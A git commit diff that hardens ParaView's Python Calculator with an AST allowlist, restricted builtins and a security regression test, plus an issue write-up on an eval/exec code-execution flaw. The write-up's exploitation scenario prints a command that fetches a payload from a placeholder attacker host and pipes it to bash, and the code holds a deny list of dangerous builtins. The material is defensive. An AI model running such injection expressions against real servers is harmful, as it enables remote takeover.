Security: Harden Python Calculator (Issue Kitware#1)\n\n- Add optional secure mode via PARAVIEW_CALCULATOR_SECURE to restrict eval/exec\n- Whitelist AST nodes and constrain call targets to safe builtins/helpers/np funcs\n- Rework globals to safe sandbox (no leaked modules)\n- Secure multiline exec path reuses validator and sandbox\n- Add regression test PythonCalculatorSecurity.py and wire into CTest\n- Ignore local build/ dirs in .gitignore\n\nDocs: issues/issue1.md and security.md for background

garland3 · garland3 · commit 79b9c0d0604c · 2025-10-05T16:13:25.000Z
diff --git a/.gitignore b/.gitignore
@@ -7,3 +7,5 @@
 .ExternalData_SHA512_*
 .DS_Store
 CMakeUserPresets.json
+builds/
+build/
diff --git a/Remoting/Application/Testing/Python/CMakeLists.txt b/Remoting/Application/Testing/Python/CMakeLists.txt
@@ -14,6 +14,7 @@ vtk_module_test_data(
 set(PY_TESTS
   Animation.py
   AnimationCache.py,NO_VALID
+  PythonCalculatorSecurity.py,NO_VALID
   AxesGridTestGridLines.py
   BackgroundColorBackwardsCompatibilityTest.py,NO_VALID
   CellIntegrator.py,NO_VALID
diff --git a/Remoting/Application/Testing/Python/PythonCalculatorSecurity.py b/Remoting/Application/Testing/Python/PythonCalculatorSecurity.py
@@ -0,0 +1,47 @@
+"""
+Security regression test for Issue 1.
+
+Enables calculator secure mode and verifies that expressions cannot access
+dangerous builtins like __import__ or os.system via the Python Calculator.
+"""
+
+import os
+import sys
+
+# Ensure secure mode is active before importing ParaView modules that load the calculator
+os.environ["PARAVIEW_CALCULATOR_SECURE"] = "1"
+
+from paraview.simple import Sphere, PythonCalculator  # minimal imports
+
+# Create a simple data source (no rendering/show to avoid Rendering group deps)
+sphere = Sphere()
+
+# Create Python Calculator filter
+calc = PythonCalculator(Input=sphere)
+calc.Expression = "__import__('os').path is not None"  # benign attribute access
+
+# Force pipeline update to evaluate expression
+try:
+    UpdatePipeline()
+except Exception as e:
+    print('[INFO] Benign expression evaluation raised exception (unexpected pre-fix):', e)
+    # Still proceed to exploit attempt
+
+# Exploit attempt: Access to __import__('os').system should be blocked in secure mode
+calc2 = PythonCalculator(Input=sphere)
+calc2.Expression = "__import__('os').system is not None"  # Should NOT be allowed after fix
+
+vulnerable = False
+try:
+    UpdatePipeline()
+    # If we reach here without restriction, vulnerability present
+    vulnerable = True
+except Exception as e:
+    print('[INFO] Exception caught (potentially fixed state):', e)
+
+# Hard fail the test only if vulnerability is still present (pre-fix expected FAIL)
+if vulnerable:
+    print('[FAIL] Python Calculator allowed access to os.system via __import__ (Issue 1)')
+    sys.exit(1)
+else:
+    print('[PASS] Access to dangerous builtins blocked (post-fix behavior)')
diff --git a/Wrapping/Python/paraview/detail/calculator.py b/Wrapping/Python/paraview/detail/calculator.py
@@ -11,12 +11,200 @@
 import paraview
 import vtkmodules.numpy_interface.dataset_adapter as dsa
 from vtkmodules.numpy_interface.algorithms import *
+import vtkmodules.numpy_interface.algorithms as _alg
 # -- this will import vtkMultiProcessController and vtkMPI4PyCommunicator
 
 from paraview.vtk import vtkDataObject, vtkDoubleArray, vtkSelectionNode, vtkSelection, vtkStreamingDemandDrivenPipeline
 from paraview.modules import vtkPVVTKExtensionsFiltersPython
 from paraview.vtk.util.numpy_support import get_numpy_array_type
 import textwrap
+import os
+import ast
+
+# Optional secure mode: when PARAVIEW_CALCULATOR_SECURE is set to a truthy
+# value, expressions are validated using a conservative AST whitelist to
+# mitigate arbitrary code execution via the Python Calculator.
+_CALCULATOR_SECURE = os.environ.get("PARAVIEW_CALCULATOR_SECURE", "").lower() in ["1", "true", "yes", "on"]
+
+# A small allowlist of builtin functions considered safe/commonly used in
+# calculator expressions. This list can be extended cautiously.
+_SAFE_BUILTINS = {
+    'abs': abs,
+    'min': min,
+    'max': max,
+    'len': len,
+    'sum': sum,
+    'float': float,
+    'int': int,
+    'pow': pow,
+    'range': range,
+}
+
+# Allowlist of numpy functions accessible via np.<func> in secure mode
+_SAFE_NUMPY_FUNCS = {
+    'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
+    'sinh', 'cosh', 'tanh',
+    'exp', 'log', 'log10', 'log1p', 'sqrt',
+    'abs', 'fabs', 'sign', 'clip', 'round', 'floor', 'ceil',
+    'minimum', 'maximum',
+    'where', 'select',
+    'mean', 'sum', 'prod', 'std', 'var',
+    'min', 'max',
+    'radians', 'degrees'
+}
+
+# Whitelisted AST node types for expressions. We intentionally exclude
+# Import/Attribute access starting with underscores, function/lambda
+# definitions, comprehensions that could leak scope, etc. This list is
+# deliberately tight; broaden only with a security review.
+_ALLOWED_AST_NODES = (
+    ast.Expression,
+    ast.BoolOp,
+    ast.BinOp,
+    ast.UnaryOp,
+    ast.IfExp,
+    ast.Compare,
+    ast.Call,
+    ast.Num,  # Py <3.8
+    ast.Constant,
+    ast.Name,
+    ast.Load,
+    ast.Attribute,
+    ast.Subscript,
+    ast.Slice,
+    ast.Tuple,
+    ast.List,
+    ast.Dict,
+    ast.Set,
+    ast.ListComp,
+    ast.SetComp,
+    ast.DictComp,
+    ast.GeneratorExp,
+    ast.comprehension,
+    ast.And,
+    ast.Or,
+    ast.Add,
+    ast.Sub,
+    ast.Mult,
+    ast.Div,
+    ast.FloorDiv,
+    ast.Mod,
+    ast.Pow,
+    ast.USub,
+    ast.UAdd,
+    ast.Eq,
+    ast.NotEq,
+    ast.Lt,
+    ast.LtE,
+    ast.Gt,
+    ast.GtE,
+    ast.Is,
+    ast.IsNot,
+    ast.In,
+    ast.NotIn,
+)
+
+_DISALLOWED_NAMES = {"__import__", "eval", "exec", "open", "input", "compile", "globals", "locals", "vars"}
+
+
+def _collect_safe_helpers():
+    """Collect a conservative set of helper functions/names that are allowed
+    in secure mode expressions. This includes algorithms.* functions and
+    numpy under np/numpy aliases; excludes dangerous modules like os."""
+    helpers = {}
+    # algorithms functions
+    try:
+        for _name in dir(_alg):
+            if _name.startswith('_'):
+                continue
+            _obj = getattr(_alg, _name)
+            if callable(_obj):
+                helpers[_name] = _obj
+    except Exception:
+        # If introspection fails, fall back to empty set (safer)
+        pass
+    # numpy shortcuts
+    helpers['np'] = np
+    helpers['numpy'] = np
+    # selected safe helpers from this module
+    for _name in ('pointIsNear', 'cellContainsPoint'):
+        if _name in globals() and callable(globals()[_name]):
+            helpers[_name] = globals()[_name]
+    return helpers
+
+
+def _build_safe_globals():
+    g = {"__builtins__": _SAFE_BUILTINS}
+    g.update(_collect_safe_helpers())
+    return g
+
+
+def _validate_ast(tree):
+    allowed_call_names = set(_SAFE_BUILTINS.keys()) | set(_collect_safe_helpers().keys())
+    for node in ast.walk(tree):
+        if not isinstance(node, _ALLOWED_AST_NODES):
+            raise ValueError("Expression contains disallowed construct: %s" % type(node).__name__)
+        # Disallow any Name that is clearly unsafe
+        if isinstance(node, ast.Name):
+            if node.id in _DISALLOWED_NAMES or node.id.startswith('_'):
+                raise ValueError("Use of disallowed name '%s' in expression" % node.id)
+        # Disallow attribute access to dunder/private attributes
+        if isinstance(node, ast.Attribute):
+            if node.attr.startswith('_'):
+                raise ValueError("Access to private attribute '%s' not allowed" % node.attr)
+        # Constrain function call targets
+        if isinstance(node, ast.Call):
+            fn = node.func
+            if isinstance(fn, ast.Name):
+                if fn.id not in allowed_call_names:
+                    raise ValueError("Call to disallowed function '%s'" % fn.id)
+            elif isinstance(fn, ast.Attribute):
+                # Allow attribute calls only on numpy aliases (np / numpy)
+                if not isinstance(fn.value, ast.Name) or fn.value.id not in {"np", "numpy"}:
+                    raise ValueError("Method calls are not allowed in secure mode")
+                if fn.attr.startswith('_'):
+                    raise ValueError("Access to private attribute '%s' not allowed" % fn.attr)
+                if fn.attr not in _SAFE_NUMPY_FUNCS:
+                    raise ValueError("Call to disallowed numpy function '%s'" % fn.attr)
+            else:
+                raise ValueError("Unsupported callable in expression")
+    return True
+
+
+def _validate_exec_block(tree: ast.AST):
+    """Validate a multiline exec block: allow only simple assignments, bare
+    expressions, and a final return, with each expression validated via
+    _validate_ast. Reject any other statements."""
+    if not isinstance(tree, ast.Module):
+        raise ValueError("Invalid multiline block")
+    for stmt in tree.body:
+        if isinstance(stmt, ast.Return):
+            # Validate return value expression
+            if stmt.value is None:
+                continue
+            _validate_ast(ast.Expression(stmt.value))
+        elif isinstance(stmt, ast.Assign):
+            # Validate assigned value only; names are checked by expression validator
+            _validate_ast(ast.Expression(stmt.value))
+        elif isinstance(stmt, ast.Expr):
+            # Bare expression line
+            if stmt.value is not None:
+                _validate_ast(ast.Expression(stmt.value))
+        else:
+            raise ValueError("Disallowed statement in secure multiline expression: %s" % type(stmt).__name__)
+
+
+def safe_eval(expression, eval_globals, eval_locals):
+    """Evaluate an expression safely using a restricted AST whitelist.
+
+    This does NOT guarantee perfect safety but blocks the most direct RCE
+    primitives (e.g., __import__, dunder attribute traversal, eval/exec)."""
+    tree = ast.parse(expression, mode='eval')
+    _validate_ast(tree)
+    # Provide a restricted builtin dict
+    # Ignore passed-in globals in secure mode to avoid leaking modules
+    g = _build_safe_globals()
+    return eval(compile(tree, filename='<calculator-secure>', mode='eval'), g, eval_locals)
 
 
 def get_arrays(attribs, controller=None):
@@ -143,24 +331,38 @@ def compute(inputs, expression, ns=None, multiline=False):
         pass
 
     if multiline:
-        # Wrap multiline expressions returning a value in a function, and evaluate it.
-        if "return" not in expression:
-            raise ValueError(
-                "Multiline expression does not contain a return statement.")
-
-        multilineFunction = f'def func():\n' \
-                            f'{textwrap.indent(expression, " " * 4)}\n' \
-                            f'result = func()\n'
-        returnValueDict = {}
-
-        # `mylocals` need to be in the global `exec` scope, otherwise it would not be accessible inside the `func` scope
-        exec(multilineFunction, dict(globals(), **mylocals), returnValueDict)
-
-        return returnValueDict['result']
+        if _CALCULATOR_SECURE:
+            # Validate the entire exec block and every expression within
+            tree = ast.parse(expression, mode='exec')
+            _validate_exec_block(tree)
+            multilineFunction = f'def func():\n' \
+                                f'{textwrap.indent(expression, " " * 4)}\n' \
+                                f'result = func()\n'
+            returnValueDict = {}
+            g = _build_safe_globals()
+            # Expose dataset variables into the function's globals
+            g.update(mylocals)
+            exec(multilineFunction, g, returnValueDict)
+            return returnValueDict['result']
+        else:
+            # Original insecure path
+            if "return" not in expression:
+                raise ValueError(
+                    "Multiline expression does not contain a return statement.")
+
+            multilineFunction = f'def func():\n' \
+                                f'{textwrap.indent(expression, " " * 4)}\n' \
+                                f'result = func()\n'
+            returnValueDict = {}
+            exec(multilineFunction, dict(globals(), **mylocals), returnValueDict)
+            return returnValueDict['result']
     else:
         finalRet = None
-        for subEx in expression.split(' and '):  # Used in 'extract_selection' to find data matching multiple criteria
-            retVal = eval(subEx, globals(), mylocals)
+        for subEx in expression.split(' and '):
+            if _CALCULATOR_SECURE:
+                retVal = safe_eval(subEx, None, mylocals)
+            else:
+                retVal = eval(subEx, globals(), mylocals)
             if finalRet is None:
                 finalRet = retVal
             else:
@@ -250,7 +452,7 @@ def execute(self, expression, multiline=False):
                 vtkRet = retVal.astype(get_numpy_array_type(self.GetResultArrayType()))
             else:
                 # we can also get a scalar, convert to single element array of correct type
-                vtkRet = numpy.asarray(retVal, get_numpy_array_type(self.GetResultArrayType()))
+                vtkRet = np.asarray(retVal, get_numpy_array_type(self.GetResultArrayType()))
 
         # by default, use filter ArrayAssociation for output attribute.
         outputAttribute = output.GetAttributes(self.GetArrayAssociation())
diff --git a/issues/issue1.md b/issues/issue1.md
@@ -0,0 +1,69 @@
+# Issue 1: Arbitrary Code Execution via Python Calculator
+
+**Severity:** High (CVSS ~8.6 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
+**Location:** `Wrapping/Python/paraview/detail/calculator.py` (`compute()` + multiline path using `eval` and `exec`)
+
+## Description
+User-supplied expressions are evaluated with Python's `eval()` (and `exec()` for multiline) using a namespace that merges globals and dataset arrays. This grants broad access to Python builtins and modules, enabling arbitrary code execution if an untrusted or semi-trusted user can submit an expression (e.g., through ParaViewWeb, shared remote sessions, or scripted pipelines).
+
+## Exploitation Scenario
+An authenticated but low-privilege user connected to a ParaViewWeb session enters an expression:
+```
+__import__('os').system('curl https://attacker/payload | bash')
+```
+This executes shell commands on the server hosting ParaView.
+
+## Impact
+Full compromise of the ParaView server process: data exfiltration, lateral movement, execution of arbitrary binaries, tampering with in-memory visualization data, pivoting into HPC cluster nodes.
+
+## Root Cause
+Unrestricted dynamic code evaluation for convenience without a security boundary or privilege layer.
+
+## Recommendations
+1. Implement a restricted expression evaluator:
+   - Parse with `ast.parse` and allow only safe nodes (`BinOp`, `UnaryOp`, `BoolOp`, `Compare`, `Name`, `Subscript`, `Attribute` with whitelist, `Call` on vetted math/array functions).
+   - Reject any `Import`, `Exec`, `Lambda`, `ClassDef`, `FunctionDef`, `Attribute` chains resolving to dunder names.
+2. Provide a hardened deployment flag (e.g., `PARAVIEW_SECURE_EXPRESSIONS=1`) that disables dynamic evaluation entirely or limits to a predeclared function set.
+3. Remove dangerous builtins from the evaluation environment: supply `{'__builtins__': {}}` and selectively re-add safe math functions.
+4. Document security posture: expression evaluation is unsafe with untrusted users.
+5. Add regression tests ensuring attempts to access `__import__`, `open`, or `os` raise errors.
+6. (Optional) Sandbox execution in a separate subprocess with a time & memory limit; communicate results via IPC.
+
+## Remediation Example (Outline)
+```python
+import ast
+ALLOWED_NODES = {ast.Expression, ast.BinOp, ast.UnaryOp, ast.Num, ast.Constant, ast.Name,
+                 ast.Load, ast.BoolOp, ast.Compare, ast.operator, ast.boolop, ast.cmpop,
+                 ast.Subscript, ast.Slice, ast.Index, ast.Attribute, ast.Call, ast.List,
+                 ast.Tuple}
+ALLOWED_FUNCS = { 'sin', 'cos', 'sqrt', 'min', 'max' }
+
+class SafeVisitor(ast.NodeVisitor):
+    def generic_visit(self, node):
+        if type(node) not in ALLOWED_NODES:
+            raise ValueError(f"Disallowed syntax: {type(node).__name__}")
+        if isinstance(node, ast.Attribute) and node.attr.startswith('__'):
+            raise ValueError('Dunder attribute blocked')
+        if isinstance(node, ast.Call):
+            if isinstance(node.func, ast.Name) and node.func.id not in ALLOWED_FUNCS:
+                raise ValueError('Function not allowed')
+        super().generic_visit(node)
+
+def safe_eval(expr, vars):
+    tree = ast.parse(expr, mode='eval')
+    SafeVisitor().visit(tree)
+    code = compile(tree, '<expr>', 'eval')
+    return eval(code, {'__builtins__': {}}, vars)
+```
+
+## Acceptance Criteria
+- Supplying dangerous expressions returns a clear error message.
+- All existing legitimate calculator expressions still function (add regression test coverage for representative examples).
+- Config flag exists to disable evaluation for hardened deployments.
+
+## Follow-Up / Defense-in-Depth
+- Usage analytics to detect abnormal expression patterns.
+- Audit logging of rejected expressions.
+
+---
+Prepared: 2025-10-03
diff --git a/security.md b/security.md